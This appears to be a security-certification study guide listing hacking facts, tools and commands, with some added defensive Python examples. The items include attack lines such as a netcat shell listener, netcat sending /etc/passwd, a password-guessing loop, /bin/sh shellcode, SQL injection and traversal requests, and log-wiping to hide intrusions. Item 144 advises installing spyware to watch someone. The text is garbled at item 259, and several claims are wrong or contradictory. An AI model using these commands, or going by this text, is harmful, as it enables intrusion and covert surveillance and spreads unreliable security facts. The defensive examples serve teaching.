116. Hardware keyloggers, software keyloggers, and sniffers can all be used to capture passwords.
117. Snow is an example of a steganography utility that exploits the nature of white space and allows the user to conceal information in these white spaces.
118. Stealth Anonymizer can be used to bypass Internet monitoring systems.
119. The three password cracking techniques are dictionary, hybrid, and brute force. A dictionary attack compares the hashes with those in a dictionary file. A hybrid attack is a combination of both brute force and dictionary. A brute force attack tries every combination of letters, numbers, upper case, lower case, and special characters. A dictionary attack is the fastest while a brute force attack takes the longest. Brute force is also your best option if random password generators are being used to create passwords for users.
120. You can always tell if a password has fewer than 8 characters because the hash will end with AAD3B435B51404EE.
121. You can use netcat to grab a password file. The syntax would be: nc -l -u -p 1111 < /etc/passwd
122. Hackers will often try to cover their tracks. If a hacker wanted to clear any records of brute force attempts, they would want to delete c:\windows\system32\config\SecEvent.Evt.
123. CACLS.exe is a command line tool that can be used to assign, display, or modify ACLs on files or folders.
124. You can use Pwdump to dump the SAM password hashes to a file. The syntax is: pwdump > file.txt
125. The last step an attacker will take in an attack, to prevent being caught, is to cover their tracks.
126. Windows 2000 Server Syskey uses 128-bit encryption. This is considered an effective countermeasure to the weaknesses in Windows LM hashes (along with enforcing Windows complex passwords).
127. Best practices for password creation:
   Never use a password found in a dictionary
   Never use a password related to your hobbies, pets, relatives, or date of birth
   Never leave a default password
   Never use a password related to the hostname, domain name, or anything else that can be found with whois
128. Windows LAN Manager (LM) hashes are converted to uppercase and split to give an effective length of 7 characters.
129. You should do the following when you introduce a new Windows computer onto your network:
   Patch the system by installing the latest service packs and hotfixes
   Configure Windows Update to be automatic
   Install a personal firewall and lock down unused ports from connecting to your computer
   Create a non-admin user with a complex password and log on to this account
   Install the latest anti-virus signatures
   Key applications should have the latest security patches installed
130. Alternate data streams are used to hide files inside of other files. Clue to spot ADS: file1.exe:file2.exe (two files separated by a colon)
131. You can crack passwords via the command line with the following command:
   for /f "tokens=1" %%a in (file.txt) do net use * \\10.0.0.1\c$ /user:"Administrator" %%a
132. Password cracking tools do not reverse the hash of a password to recover passwords. Instead, they hash words and compare the result with the password's hash.
133. The best countermeasure against privilege escalation is to give each user the least amount of privileges.
134. MBSA is a patch management utility that scans one or more computers on your network and alerts you if any important Microsoft security patches are missing.
135. 14-character passwords do not take much longer to crack than 8-character passwords because LanManager hashes are broken up into two seven-character fields.
136. Attacking well-known system defaults is one of the most common hacker attacks. Often the default location of installation files can be exploited, which allows a hacker to retrieve a file from the system; many software packages come with "samples" that can be exploited; and many systems come with default user accounts with well-known passwords that administrators forget to change.
137. Image steganography hides information within picture files.
138. If you have remote users connecting in to a Windows Server 2003 Active Directory domain by using Challenge Handshake Authentication Protocol (CHAP), then you should enable the "Store password using reversible encryption for all users in the domain" setting in the Default Domain Group Policy.
139. One indication that you may be infected with a stealth kernel-level rootkit is that you start to realize that your computer is not running as fast as it used to and your computer reports you have limited space on your hard drive.
140. Steganography fits in the Hide Files step of the system hacking cycle.
141. To protect your VoIP network that uses the operating system VxWorks on the phones, block UDP port 17185 at the firewall to prevent the OS default debugger program from communicating outside the network (note: the exam may incorrectly have this as TCP port 17185; just remember it is port 17185).
142. Kerberos uses port 88 (TCP/UDP).
143. Security tokens are a good choice for two-factor authentication. They are a hardware device that you can use along with a security or identifying PIN and are often less expensive than smart cards.
144. You can install screen capturing spyware on someone's computer to track that person's activities online and send you an e-mail once a day so you can see what they have been up to when they surf the web.
145. PDF passwords can be easily cracked.
146. If you notice your log file decreasing in size, you should log this as suspicious activity, continue to investigate, and take further steps according to your security policy.
147. You can use the Elsave utility to clear event logs. Winzapper will selectively erase event logs.
148. OutGuess is a steganography tool for JPG images; wbStego works with bitmaps.
149. GINA is the Graphical Identification and Authentication DLL that can be used to replace the login screen.
150. Challenge/response authentication is used to prevent replay attacks.
151. Mandatory access control uses sensitivity labels on information and compares them to the level of security a user is operating at.
152. Disable LM authentication in the registry on Windows XP.
153. John the Ripper can be used to crack a variety of passwords, but the output does not show if the password is upper or lower case.
154. You should not respond to invalid usernames and passwords with "Invalid Username" and "Invalid Password" (this reveals too much information).
155. You can extract a Trojan from a standalone file with this syntax: C:\cat textfile.txt:Trojan.exe > Trojan.exe
156. The following command, when executed between two hosts, can generate a huge amount of useless network data that you can use for performance testing:
   Machine 1: # yes XXXXXXXXXXXXXXXXXXXXXXXXXXXX | nc -v -v -l -p 55555 > /dev/null
   Machine 2: # yes ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ | nc machine1 55555 > /dev/null
Trojans and Backdoors
157. Use cryptcat instead of netcat if you want to encrypt your traffic.
158. A Trojan is a program masked inside another program (such as a game). You can often see the Trojan running in the background by looking in the Windows Task Manager. The process of hiding a Trojan or keylogger in another file is called wrapping.
159. You should compare a file's MD5 signature with the one published on the distribution media to make sure that the file is not infected with a Trojan.
160. To see what application executables are listening on ports, run the fport utility.
161. Example of a Snort log showing a Back Orifice attack: 04/20-13:04:45.01351 172.16.0.5:31337 -> 192.168.1.1:1025
162. To start a Netcat listener: nc -l -p -e cmd.exe -d
163. To connect to a Netcat listener: nc
164. Qaz is a Trojan that renames notepad to note.com.
165. DNS uses port 53 and is often used by backdoor programs because it is most likely open.
166. Hackers will often make their Trojans persistent by adding a registry entry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
167. Tripwire is an example of a file integrity verification tool that can be used to detect unauthorized changes or modification of binary files on a system.
168. You can use the Netstat command to see how many connections your computer is currently running.
169. Use the fport utility to look for applications that listen on certain ports.
170. Port 6667 is used by the Net-Devil Trojan. In hex, this is 0x1A0B.
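As an added example, not from the study guide, here is a small Python detector that parses Snort header lines of the form shown in item 161 and flags the Trojan ports the guide lists in items 161 and 170. Every log line except the page's own Back Orifice line is constructed for the demo.

```python
# Added example (not from the study guide): parse Snort-style packet headers
# like the Back Orifice line in item 161 and flag connections on the ports the
# guide ties to Trojans (31337 Back Orifice in item 161, 6667 Net-Devil in
# item 170). All log lines except the first are constructed for the demo.
import re
from typing import Optional

# Port table built only from items 161 and 170. Port 53 (item 165) is left out
# on purpose: DNS is legitimate traffic, so it needs content inspection, not a
# port match.
TROJAN_PORTS = {31337: "Back Orifice", 6667: "Net-Devil"}

# "<timestamp> <src ip>:<port> -> <dst ip>:<port> [proto ...]"
HEADER_RE = re.compile(
    r"^(?P<ts>\S+)\s+"
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)"
    r"(?:\s+(?P<proto>TCP|UDP|ICMP))?"
)


def parse_header(line: str) -> Optional[dict]:
    """Split a Snort header line into its fields; None if the line is not one."""
    m = HEADER_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["sport"] = int(fields["sport"])
    fields["dport"] = int(fields["dport"])
    return fields


def classify(line: str) -> Optional[str]:
    """Return an alert string when either end of the flow is a known Trojan port."""
    h = parse_header(line)
    if h is None:
        return None
    for side, port in (("src", h["sport"]), ("dst", h["dport"])):
        if port in TROJAN_PORTS:
            # item 170 quotes the port in hex as well, so show both forms
            return f"{TROJAN_PORTS[port]} port {port} (0x{port:04X}) on {side} {h[side]}"
    return None


def scan(lines) -> list:
    """Run classify over a log and keep only the hits, in log order."""
    return [alert for alert in map(classify, lines) if alert]


SAMPLE_LOG = [
    # the page's own Back Orifice example (item 161)
    "04/20-13:04:45.01351 172.16.0.5:31337 -> 192.168.1.1:1025",
    # constructed: ordinary web request, should not alert
    "04/20-13:05:02.10022 192.168.1.7:51234 -> 10.0.0.80:80 TCP TTL:64 TOS:0x0 ID:2201 DF",
    # constructed: internal host connecting out to the Net-Devil port
    "04/20-13:05:40.44410 192.168.1.9:1044 -> 203.0.113.5:6667 TCP TTL:128 TOS:0x0 ID:7 DF",
    # separator Snort prints between packets; must be ignored
    "=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```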
Sniffers
171. You can get around switches by using ARP spoofing, MAC duplicating, and MAC flooding. ARP spoofing the default gateway is a common method to capture traffic when using a switched network. Without other techniques like MAC flooding or ARP spoofing, you will not be able to capture traffic on a switched network. Use ./macof to flood the port-to-MAC-address table (CAM table). This will move the switch into broadcast mode and allow you to sniff all packets on the network.
172. Ettercap and Ethereal (now Wireshark) are popular sniffers. Sniffers work best on networks using hubs. To detach Ettercap from the console and log all sniffed passwords to a file, use the command: ettercap -NCLzs --quiet
   Ethereal allows for filters. For example, to create a display filter that only looks for the three-way handshake for a connection from host 172.16.0.4, the filter would be: ip.addr==172.16.0.4 and tcp.flags.syn
173. WinPcap is the name of the Windows Packet Capture library which must be installed in order to use a sniffer on Windows platforms. Many sniffers install this automatically for you. libpcap is the equivalent for Linux.
174. The best options for preventing attackers from sniffing your passwords are to use Kerberos, smart cards, and/or Stanford Secure Remote Password (SRP).
175. You can defend against ARP spoofing by:
   - placing static ARP entries on servers, workstations, and routers
   - using the ARPWALL system
   - tuning IDS sensors to look for large amounts of ARP traffic on local subnets
176. Wireshark (Ethereal) allows for filters. For example, to filter only packets with Hotmail e-mail messages, use the filter (http = "login.passport.com") && (http contains "POP3").
177. TCPflow can be used to extract the application layer data from each TCP connection from a log file into separate files.
Denial of Service
178. A smurf attack is when you send a broadcast ping with a spoofed source address of your target. A fraggle attack is similar to a smurf attack but uses UDP.
179. A SYN flood is a DoS attack in which a large number of SYN packets appear on a network without the corresponding reply packets.
180. A LAND attack is when an attacker forges a TCP/IP packet, causing the victim to try to open a connection with itself. This causes the system to go into an infinite loop which, in turn, can slow down the system.
181. The following are techniques used to block against SYN flood attacks:
   - Micro blocks: instead of allocating a complete connection object, simply allocate a micro-record.
   - SYN cookies: instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the client's IP address, port number, and other information. When the client responds with a normal ACK, the sequence number will be included, which the server then verifies.
   - RST cookies: an alternative to SYN cookies where the server sends a wrong SYN/ACK back to the client. The client should generate a RST packet telling the server that something is wrong, which informs the server that the client is valid.
   - Stack tweaking: TCP stacks can be tweaked to reduce the effects of SYN floods. For example, timeouts can be changed.
182. A Ping of Death attack sends fragmented ICMP packets that, when reconstructed, are larger than 65,536 bytes.
183. IDS devices are primary victims of smurf attacks.
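As an added example, not from the study guide, here is the SYN cookie idea from item 181 in Python: the server keeps no half-open state, derives the initial sequence number in its SYN-ACK from a keyed hash of the client's address and port plus a time slot, and later checks that the client's ACK carries that value. The cookie layout, the secret, the 64-second slot and the small MSS table are assumptions of this example.

```python
# Added example (not from the study guide): SYN cookies as item 181 describes.
# Instead of allocating a record for a half-open connection, the server derives
# the ISN it places in the SYN-ACK from the client's IP/port, a time slot and a
# secret. The client's ACK must carry ISN+1, which the server can re-derive and
# check. Layout, secret, slot length and MSS table are assumptions of this demo.
import hashlib
import hmac
import os
import time

SECRET = os.urandom(32)                 # per-server secret; rotate periodically
SLOT_SECONDS = 64                       # cookies are valid for about two slots
MSS_TABLE = (536, 1220, 1440, 1460)     # MSS values that fit in the 3-bit field


def _mac(src_ip, src_port, dst_ip, dst_port, slot):
    """24-bit keyed hash over the 4-tuple and the slot counter."""
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{slot}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_cookie(src_ip, src_port, dst_ip, dst_port, client_mss, now=None):
    """ISN for the SYN-ACK: 5 bits of slot | 3 bits of MSS index | 24-bit MAC."""
    now = time.time() if now is None else now
    slot = int(now // SLOT_SECONDS) & 0x1F
    # remember the largest table MSS the client can accept
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= client_mss), default=0)
    return (slot << 27) | (mss_idx << 24) | _mac(src_ip, src_port, dst_ip, dst_port, slot)


def check_cookie(ack_num, src_ip, src_port, dst_ip, dst_port, now=None):
    """Verify the ACK that completes the handshake.
    Returns the negotiated MSS when the cookie is ours and fresh, else None."""
    now = time.time() if now is None else now
    cookie = (ack_num - 1) & 0xFFFFFFFF     # client acknowledges ISN + 1
    slot, mss_idx, mac = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
    cur = int(now // SLOT_SECONDS) & 0x1F
    if slot not in (cur, (cur - 1) & 0x1F):  # too old (or a forged slot)
        return None
    if mss_idx >= len(MSS_TABLE):
        return None
    expected = _mac(src_ip, src_port, dst_ip, dst_port, slot)
    # constant-time compare so the MAC cannot be guessed byte by byte
    if not hmac.compare_digest(mac.to_bytes(3, "big"), expected.to_bytes(3, "big")):
        return None
    return MSS_TABLE[mss_idx]


if __name__ == "__main__":
    isn = make_cookie("10.0.0.5", 40000, "10.0.0.1", 80, 1460)
    print(hex(isn), check_cookie(isn + 1, "10.0.0.5", 40000, "10.0.0.1", 80))
```

A real stack would also have to fall back to ordinary behaviour for TCP options that do not fit in the cookie; this demo keeps only the MSS.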
184. A denial of service attack prevents legitimate users from gaining access to a service. A distributed denial of service (DDoS) attack uses zombie hosts to launch an attack.
185. A Teardrop attack modifies offset values.
186. Ping sweeping your network may cause your IDS to report a smurf attack. To prevent these alarms, do not scan the broadcast IP address when scanning your network.
187. Hackers usually control bots through IRC channels. The initial two commands that an IRC client sends to join an IRC network are USER and NICK. (Note: technically, the PASS command comes first according to RFC 1459, but it is optional. Therefore, USER/NICK are the initial two commands.)
188. Network Based Application Recognition (NBAR) is a Cisco IOS mechanism that examines packets on Layers 4 to 7. It can be used to counter DDoS attacks and worm-generated traffic by identifying malicious packets and dropping them.
189. Emsa Web Monitor can be used to check on the status (uptime statistics) of your web server.
190. Make sure your router won't take a directed broadcast, to prevent smurf attacks.
191. Reflective DDoS attacks usually spoof the originating IP addresses and send the requests at reflectors. To detect reflectors on your network, you should scan the network using Nmap for the services used by these reflectors.
192. Trinoo, TFN2k, WinTrinoo, T-Sight, and Stacheldraht are all DDoS tools.
193. The following command may freeze a router: ping -l 56550 10.0.0.1 -t
Session Hijacking
194. To perform a session hijack, you must find the sessions, predict the sequence number, and take over the session.
195. Strong authentication is not enough to call your network secure because someone could always perform session hijacking to take over sessions that are already authenticated. This is the key advantage of session hijacking: taking over an already authenticated connection.
196. Hunt is a common session hijacking tool. It can intercept traffic and then perform a man-in-the-middle attack (MiTM).
197. In a man-in-the-middle (MiTM) attack, an attacker will intercept a transmission to copy and forward all packets between two hosts.
198. Using unpredictable sequence numbers will help secure against session hijacking.
199. TCP/IP session hijacking is carried out on the transport layer.
200. Challenge/response authentication is used to prevent session hijacking attacks.
201. Use unpredictable sequence numbers to secure sessions against hijacking.
202. RFC 2827 helps defeat IP address spoofing.
Buffer Overflows
203. Canary words are a method used by compilers to send an alarm if a buffer overflow has been attempted. The canary adds NULL (0x00), CR (0x0d), LF (0x0a), and EOF (0xff). If they get altered when a function returns, an alarm is sent.
204. NOP sleds send a series of No Operation instructions in an attempt to guess the return pointer. The hexadecimal value for a NOP is 0x90.
205. The following code is usually an indication of a buffer overflow attack:
   char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
206. Buffer overflows can be exploited using such function calls as fgets(), scanf(), strcpy() and strncpy().
207. Buffer overflows are due to programming errors and bad quality assurance practices.
208. Polymorphic shellcode works by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode.
209. Two types of buffer overflows are heap based and stack based.
210. When writing shellcode, be sure to remove any null bytes as they will end the string.
211. Buffer overflows will overwrite the ESP register with a return address of the exploit code.
212. The following pseudo code demonstrates the logic of stopping a stack from holding more than 200 characters in a buffer: IF (I > 200) then exit (1)
213. Many IDS devices will have signatures for common buffer overflow attacks. Attackers can get around this by using polymorphic shellcode with a tool such as ADMutate to change the signature of their exploits.
214. Using printf(str) instead of printf("%s", str) may leave your program exposed to format string attacks.
215. Buffer overflows often try to exploit an application and launch a command shell. Below is an example of output from a network IDS of an attack that is trying to get a Linux command shell (/bin/sh):
Hacking Web Servers
216. Setting your web pages to be read-only may prevent others from being able to deface them.
217. IIS runs in the context of the LocalSystem account. If a hacker successfully performs a buffer overflow attack against a default IIS installation on a Windows 2000 server, the hacker may be able to spawn a shell. The default privileges within the shell will be LocalSystem.
218. Hex encoded characters are commonly used to obfuscate URLs.
219. Cookies can be session or permanent cookies.
220. IPP, Code Red, and ISAPI Indexing Services are all used in IIS buffer overflow exploits.
221. Some web sites use cookies to keep a user session active once a user has logged in. When a user logs in to the application, a cookie can be sent to the client that may contain the user ID, which is checked for access rights. A hacker can compromise a system that uses cookies by intercepting the communication between the client and the server and changing the cookie to make the server believe that there is a user with higher privileges.
222. If you can access someone's cookie, you can use parameter manipulation to alter the cookie to gain additional access. For example, if the cookie says ADMIN=no, you can change the parameter to say ADMIN=yes.
223. A DNS poisoning attack is when a hacker changes a DNS entry for a web site to point to their web server instead of the legitimate site.
224. Many systems come with default user accounts with well-known passwords that administrators forget to change.
225. Often the default location of installation files can be exploited, which allows a hacker to retrieve a file from the system.
226. Many software packages come with "samples" that can be exploited.
227. Attackers may be able to store a copy of your web page locally, change a 'hidden' price value in the source code, and submit an order in order to purchase products at a lower price.
228. Canonicalization is the process of converting something from one representation to the simplest form. It deals with the way in which systems convert data from one form to another.
229. You can use the robots.txt file in the root of your website to define directories that you do not want crawled by WWW spiders.
230. One approach to secure against phishing scams is to use RSA SecurID based authentication systems along with one-time password lists.
231. Form Scalpel can be used to dissect HTML forms.
Web Application Vulnerabilities
232. Use wget to download multiple web pages.
233. Web applications often have non-validated parameters, broken access control, broken session management, cross-site scripting, and buffer overflow vulnerabilities.
234. Web applications can have several vulnerabilities, including visible clear text passwords, the anonymous user account left at its default setting, missing latest security patches, no firewall filters, and no SSL configured.
235. Cross-site scripting (XSS) attacks allow commands to be executed on your machine under your local privileges without installing any software. Web forums are often vulnerable to these kinds of attacks. A clue that cross-site scripting is being done is the tag. An example of a cross site scripting attack is when you click on a link in an e-mail message and are taken to a web based bulletin board where certain functions are executed on your local machine under your privileges without your knowing. Cross-site scripting attacks often try to grab a person's cookie. To view your cookie via JavaScript for a particular site, the code would be alert(document.cookie). The best way to protect against XSS attacks is to disable JavaScript in IE and Firefox browsers.
236. Lynx is a scaled down, text-based, basic web browser that you can use when testing sites which you suspect may have malicious code on them.
237. Use HTTP SSLv3 to send data instead of plain HTTPS.
238. Java uses a sandbox to isolate code and is therefore not vulnerable to buffer overflow attacks.
239. The GET method should never be used when sensitive data such as credit card information is being sent to a CGI program. This is because any GET command will appear in the URL. Replace the GET method with the POST method when sending data.
240. Session management web application testing is focused on checking the time validity of session tokens, the length of tokens, and the expiration of session tokens.
241. Website cloaking is a technique to perform a reverse IP address lookup to get the domain name of a person browsing your site. Once this is determined, you can direct them to a specific version of a page for particular domains.
242. To protect against attacks that run on top of SSL, install a proxy server and terminate SSL at the proxy, or install a hardware SSL "accelerator" and terminate SSL at this layer.
243. An example of a Web Bug is a small .jpg file that is one pixel in height and width that can cause unwanted behavior when users browse a site.
244. SSL operates at the transport layer and S-HTTP operates at the application layer.
Web Based Password Cracking
245. Passwords can be basic, digest, or integrated. Basic sends the password in clear text so it is easily sniffed. Digest is more secure than basic because passwords are hashed.
246. Single sign-on is when users only have to remember one username and password to be authenticated to multiple services.
247. The Remote Password Assassin (RPA) is a password cracking tool that can run dictionary attacks against FTP and Web servers. To defend against these types of attacks you should:
   - Never use a password related to a hostname, domain name, or anything else that can be found with whois
   - Never use a password related to your hobbies, pets, relatives, or date of birth
   - Never leave a default password
   - Never use a password that can be found in a dictionary
Linux Hacking
248. ps is the command to list processes running on a system.
249. Rootkits can be used to hide processes, files, or registry entries.
250. The three most common commands that hackers attempt to Trojan on a Linux box are netstat, ps, and top.
251. Loadable Kernel Modules (LKM) are compiled on the fly; they do not require you to recompile the kernel.
252. Cygwin is a free UNIX subsystem that runs on top of Windows.
253. Rootkits are often used to replace legitimate programs. For example, you could use one to replace ifconfig in Linux to prevent others from seeing that your network card is operating in promiscuous mode.
254. Hackers will often try to cover their tracks. On Linux machines, a hacker can remove rootkits that they installed with the 'rm' command.
255. The execve() system call is used with setuid to escalate privileges. The best way to protect against execve() vulnerabilities is to disable the execve() system call.
256. iptables, available in Linux kernel 2.4 and up, provides for stateful packet inspection (SPI). The following is an example of an iptables rule that allows TCP packets coming in on interface eth1 from any IP address destined for 172.16.1.1:
   iptables -A INPUT -s 0/0 -i eth1 -d 172.16.1.1 -p tcp -j ACCEPT
257. Filesnarf copies files transferred via NFS over a network.
258. You can check for the presence of rootkits in Linux by typing sudo chkrootkit.
259. You can wipe a Linux hard drive with the following command: For (( i = 0; i 109
278. An example of SQL injection is http://www.testsite.com/data.asp?name=me%27%3bupdate%20user table%20set%20pass%3d%27letmein%27%3b--%00
279. SQL injection can be used where there are poorly designed input validation routines.
280. The following is an example of code that is susceptible to a SQL injection attack because it provides no input validation:
   sSQL = "SELECT * FROM Users where Username='" & Request("user") & "' and Password='" & Request("pwd") & "'"
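As an added example, not from the study guide, item 280's concatenated login query is rebuilt here in Python against a constructed in-memory SQLite table and placed next to the parameterised form, so the difference in behaviour can be seen on the same input. The table row and the sample inputs are made up for the demo.

```python
# Added example (not from the study guide): the string-built login query from
# item 280, beside the parameterised version. The user table and the inputs
# are constructed here; SQLite stands in for the real database.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table with a single valid account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    con.execute("INSERT INTO Users VALUES ('alice', 's3cret')")
    return con


def login_vulnerable(con: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Builds the SQL by concatenation exactly as the ASP snippet does, so
    whatever the client sends becomes part of the statement itself."""
    sql = ("SELECT * FROM Users WHERE Username='" + user +
           "' AND Password='" + pwd + "'")
    return con.execute(sql).fetchone() is not None


def login_parameterised(con: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Same query with bound parameters: the values travel separately from the
    statement, so quotes or comment markers in them cannot change its meaning."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return con.execute(sql, (user, pwd)).fetchone() is not None


def demo() -> dict:
    """Run both versions on a good login and on a constructed injection input."""
    con = make_db()
    # Constructed input: the quote closes the literal, OR '1'='1' makes the
    # WHERE clause always true, and "--" comments out the password check.
    injected = "' OR '1'='1' --"
    return {
        "vuln_good":   login_vulnerable(con, "alice", "s3cret"),
        "vuln_bypass": login_vulnerable(con, injected, "x"),
        "safe_good":   login_parameterised(con, "alice", "s3cret"),
        "safe_bypass": login_parameterised(con, injected, "x"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```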
Hacking Wireless Networks
281. AirSnort implements the Fluhrer-Mantin-Shamir (FMS) attack. Only encrypted packets are counted. You need to capture around five to ten million packets in order to crack WEP with AirSnort.
282. Wireless access points act like hubs on a network. Therefore, you will be able to capture more traffic in a shorter amount of time on a wireless network than on a wired network.
283. Aircrack uses KoreK's implementation for wireless hacking. AirSnort uses the FMS attack.
284. A wireless injection attack is when you re-inject ARP requests hundreds of times per second on a wireless network.
285. SSIDs are not considered a good security mechanism to protect a wireless network because the SSID is transmitted in clear text.
286. In warchalking, a )( symbol represents an open access point (unfiltered/unencrypted).
287. Wardriving is when a hacker drives around in a car looking for wireless networks.
288. If a wireless access point is using MAC filtering, sniff traffic on the WLAN and spoof your MAC address to one you have captured.
289. Even if a network disables SSID broadcast, you can still get the SSID by sniffing the wireless network. The SSID is still sent inside both client and AP packets.
290. Directional antennas are not enough to secure your network because wireless signals can still be detected from miles away.
291. If you are not capturing enough traffic to crack a WEP key, use a sniffer like Ettercap to discover the gateway, then send an ICMP ping flood to generate traffic.
292. A rogue access point is an unauthorized access point that overrides the signal of an authorized access point.
293. 802.11a operates in the 5.15 – 5.825 GHz frequency range.
294. VPNs are often used in wireless networks but they will double the overhead on an access point.
295. WEP encryption is vulnerable because there is no mutual authentication between wireless clients and access points, automated tools can discover WEP keys, and the 24 bit IV field is too small.
296. The SSID identifies your wireless network and acts as a password for network access.
297. GPSDrive can be used to map wireless access points.
Viruses
298. Messenger spam is when you receive a pop up on your screen with SPAM. It usually uses ports 1026 to 1029.
299. The following are common file attachments that are used by viruses and malware: .scr .vbs .com .exe .pif .htm
300. MS Blaster exploits ports 135 and 445. A Snort rule to detect MS Blaster will reference these ports:
   alert tcp $EXTERNAL_NETWORK any -> $INTERNAL_NETWORK 135
   alert tcp $EXTERNAL_NETWORK any -> $INTERNAL_NETWORK 445
301. The European Institute for Computer Antivirus Research has created the following string that can be used as a harmless test virus to test your antivirus software: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
302. Signature based virus scanners are only as good as their signature database. If there is no signature, then a virus will not be detected.
303. To check for unauthorized changes to files, use file integrity verification tools. Tripwire is a popular file integrity verifier.
304. Antivirus programs compare the signature of executable files to a database of known viral signatures. Polymorphic viruses cannot be detected by a signature-based anti-virus program.
305. Melissa is a macro virus.
306. The Slammer worm exploits a buffer overflow in the MS-SQL resolution service.
307. The best protection against viruses is prevention, not detection. That is, you should stop viruses from getting onto the system in the first place, not just scan for viruses. One way to stop viruses from getting onto your system is to disable the use of external media such as USB thumb drives and floppy disks.
308. A worm is self-replicating while a virus attaches itself to another host.
309. Nimda exploits the directory traversal Unicode exploit in IIS. (E.g., GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir)
310. The OSX/Leap-A virus is a Mac OS X virus that spreads via iChat.
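As an added example, not from the study guide, here is canonicalization in the sense of item 228 applied to the Nimda request in item 309: percent-decoding is repeated until the path stops changing (so the double-encoded %255c, which decodes to %5c and then to a backslash, is caught), backslashes are treated as separators the way IIS does, "." and ".." segments are resolved, and the function reports whether the request tried to climb above the web root. The request lines other than the page's Nimda one are constructed.

```python
# Added example (not from the study guide): canonicalise a request path the way
# item 228 describes and use the result to spot the traversal in item 309.
# Overlong UTF-8 forms such as %c0%af (the "Unicode" half of the Nimda bug) are
# a separate decoding step that this demo does not cover.
from urllib.parse import unquote


def canonicalize(raw_path: str, max_rounds: int = 3):
    """Return (simplest form of the path, True if it escapes the web root)."""
    path = raw_path.split("?", 1)[0]            # the query string is not a path
    for _ in range(max_rounds):                 # %255c -> %5c -> "\"
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")              # IIS accepts either separator
    segments, escaped = [], False
    for seg in path.split("/"):
        if seg in ("", "."):
            continue                            # empty or current dir: no effect
        if seg == "..":
            if segments:
                segments.pop()                  # go up one level
            else:
                escaped = True                  # tried to go above the root
        else:
            segments.append(seg)
    return "/" + "/".join(segments), escaped


def is_traversal(request_line: str) -> bool:
    """True when the request target, once canonicalised, leaves the web root."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    return canonicalize(parts[1])[1]


def flag_requests(lines):
    """Return the request lines whose path escapes the root, in log order."""
    return [line for line in lines if is_traversal(line)]


SAMPLE_REQUESTS = [
    # the page's Nimda example (item 309)
    "GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    # constructed: ordinary page fetch
    "GET /index.html HTTP/1.0",
    # constructed: ".." that stays inside the root, must not be flagged
    "GET /images/../css/site.css HTTP/1.1",
    # constructed: single-encoded backslash variant of the same trick
    "GET /scripts/..%5c..%5cwinnt/win.ini HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(canonicalize(line.split()[1]), line)
```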
Evading IDS, Firewalls, and Honeypots
311. To operate Snort in packet logger mode, type ./snort -dev -l ./log
312. Session splicing is when an attacker attempts to deliver the payload over a continuous stream of multiple small packets over long periods of time, with the purpose of defeating simple pattern matching in IDS systems without session reconstruction.
313. Snort can operate as an IDS, packet logger, or sniffer.
314. The Send-Safe proxy server can be used to help evade honeypots.
315. Snort has great flexibility in creating rules. For example, the following rule will alert you whenever a TCP packet originating from any IP address is destined for any IP address on the 10.0.0.0 subnet on port 2222: alert tcp any any -> 10.0.0.0/8 2222. As another example, here is the rule to capture FTP root login attempts: alert tcp any any -> any 21 (content:"user root";).
316. A SOCKS proxy can be used to transparently connect through a firewall. SOCKS uses port 1080.
317. Obfuscation techniques include using non-standard ports or redirecting attempts to standard ports to a secure area that is logged.
318. Encrypting communication between an agent and a monitor in an IDS is useful because the monitor will know if counterfeit messages are being generated (they will not be encrypted).
319. Firewalls cannot inspect encrypted traffic such as that used with SSL on port 443. SSL can be used to mask the contents of a packet and bypass intrusion detection systems.
320. A hacker can use Tor for anonymity on the Internet by going through multiple proxy servers on the Internet.
321. Snort is a freeware, open source program that can be used to detect attacks such as port scans.
322. Fragroute is a tool that will craft packets to confuse pattern matching IDSs.
323. A honeytoken is a fake document that is set up to see if employees are accessing unauthorized documents.
324. A covert channel is making use of a protocol in a way it was not intended to be used. It is a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDSs on a network. This is sometimes called a network tunnel.
325. A host can continue to receive data as long as the SYN sequence numbers of transmitted packets from another host are lower than the packet segment containing a set FIN flag.
326. A clue that your packets might be going through a stateful inspection firewall is that a traceroute shows the same IP address twice.
327. If web servers in a DMZ are responding to ACK packets on port 80, then chances are there is no stateful inspection firewall in use.
